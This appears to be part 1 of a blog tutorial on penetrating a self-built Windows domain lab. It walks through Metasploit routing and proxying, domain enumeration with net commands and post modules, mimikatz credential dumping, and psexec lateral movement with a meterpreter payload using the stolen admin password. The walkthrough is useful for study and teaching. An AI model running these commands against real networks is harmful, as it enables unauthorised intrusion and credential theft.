Remember a simple domain penetration (part 1)

1. Environment

The domain environment is self-built, basically imitating enterprise deployment

域：learn.com


操作系统类型          IP地址        本地账户/密码      域账户/密码              角色
Windows 2008 R2    192.168.138.129  Administrator/     learn\Administrator      DC域控
                                    [email protected]       [email protected]

Windows 2003  网卡1：192.168.138.130  Administrator/   learn\win2003            域主机/
              网卡2：192.168.47.159   root             win@2003                 外网站点服务器

Windows XP         192.168.138.131    Administrator/   learn\winxp              域内主机
                                      root             [email protected] 

Second, the penetration steps

ps: Because it is an internal network test, the previous steps of entering the internal network from the external network are omitted! That is, it is assumed that the attacker has taken control of the windows 2003 host.

2.1 Information collection

2.1.1 IP-domain information

信息整理
账户:  learn\win2003
域:    learn.com
内网IP:  192.168.138.130
外网IP:  192.168.47.159
域控制器DC的IP: 192.168.138.129
另一台域内主机:  192.168.138.131

C:\Documents and Settings\win2003\����>ping learn.com
                                                                                                           
Pinging learn.com [192.168.138.129] with 32 bytes of data:                                                                            
Reply from 192.168.138.129: bytes=32 time<1ms TTL=128                                                                                 

内网主机发现：
1、在metepreter的shell里执行: for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.138.%I | findstr "TTL="
2、建立路由-代理进行内网扫描（参考 2.1.2节 ）

2.1.2 Establish routing-proxy

run autoroute -s 192.168.138.0/24      #通过当前session建立一条通往内网网段的路由
run autoroute -p

Method 1: Scanning module that comes with msf

主机发现：（自己用来看看效果吧！）
use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/netbios/nbname
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/discovery/udp_probe  
use auxiliary/scanner/discovery/udp_sweep

端口扫描：
use auxiliary/scanner/portscan/ack

服务扫描：自己挑着用吧！
search auxiliary/scanner/

Method 2: Set up proxychains

use auxiliary/server/socks4a
set SRVPORT 3333
run

vi/etc/proxychains.conf
socks4 192.168.47.147 3333

sudo proxychains3 nmap -Pn -sS 192.168.138.0/24（由于在域内，单纯的扫描可能识别不到，可参考附带一些常用端口去扫描）
sudo proxychains3 nmap -Pn -sS 192.168.138.129 -p 3389,445

2.1.3 Domain user information collection

Common instructions

ipconfig /all   查看本机ip，所在域
 route print     打印路由信息
 net view        查看局域网内其他主机名
 arp -a          查看arp缓存
 net start       查看开启了哪些服务
 net share       查看开启了哪些共享
 net share ipc$  开启ipc共享
 net share c$    开启c盘共享
 net use \\192.168.xx.xx\ipc$ "" /user:""   与192.168.xx.xx建立空连接
 net use \\192.168.xx.xx\c$ "密码" /user:"用户名"  建立c盘共享
 dir \\192.168.xx.xx\c$\user    查看192.168.xx.xx c盘user目录下的文件
 ​
 net config Workstation   查看计算机名、全名、用户名、系统版本、工作站、域、登录域
 net user                 查看本机用户列表
 net user /domain         查看域用户
 net localgroup administrators   查看本地管理员组（通常会有域用户）
 net view /domain         查看有几个域
 net user 用户名 /domain   获取指定域用户的信息
 net group /domain        查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
 net group 组名 /domain    查看域中某工作组
 net group "domain admins" /domain  查看域管理员的名字
 net group "domain computers" /domain  查看域中的其他主机名

MSF module

 run post/windows/gather/enum_ad_computers
 run post/windows/gather/enum_logged_on_users 
 run post/windows/gather/enum_ad_groups 
 
 run post/windows/gather/enum_domain
 run post/windows/gather/enum_domain_group_users
 run post/windows/gather/enum_domain_tokens
 run post/windows/gather/enum_domain_users
 run post/windows/gather/enum_domains

信息整理
域： learn.com
域用户：Administrator   Guest      krbtgt    win2003   winxp 

Use the built-in mimikatz of msf to extract account passwords

load mimikatz  #加载 mimkatz 模块
help  #查看命令

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds.   #提取域账户密码
    livessp           Attempt to retrieve livessp creds.
    mimikatz_command  Run a custom command.
    msv               Attempt to retrieve msv creds (hashes).
    ssp               Attempt to retrieve ssp creds.
    tspkg             Attempt to retrieve tspkg creds.
    wdigest           Attempt to retrieve wdigest creds.    #提取内存里的账户密码

meterpreter > 

Thinking:Entering the intranet, we want to get domain administrator account permissions more, we can forge certificates for PTT attacks, or get plaintext passwords directly! ! !
(Prerequisite, when the host in the domain does not have system-level or general service vulnerabilities)

2.2 Lateral movement of the intranet

2.2.1 Clear text password in dump memory

In order to easily obtain the password in the memory, the domain administrator account is used to access the win2003 extranet server.

**In this way, the account and password of the domain administrator are obtained: ** Administartor/[email protected] is
here, you can basically walk across the intranet! ! !

比如前面我们知道内网还存在一台主机 192.168.138.131
简单演示：
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp   #注意，在内网中，往往网络会受限制，通常使用 bind 系列的payload
set rhost 192.168.138.131
set rhosts 192.168.138.131
set smbdomain learn.com
set smbuser Administrator
set smbpass [email protected]
set lport 5556
explort

Three, summary

but: In practice, we can't get the plaintext password! In large and medium-sized enterprises, hosts under win2008 are basically not used.

Next, we need to use PTH PTT attack .
Tired of writing, let's do this for now!

We will continue to add the PTH PTT attack part later, look forward to it! ! !
PTH and PTT attacks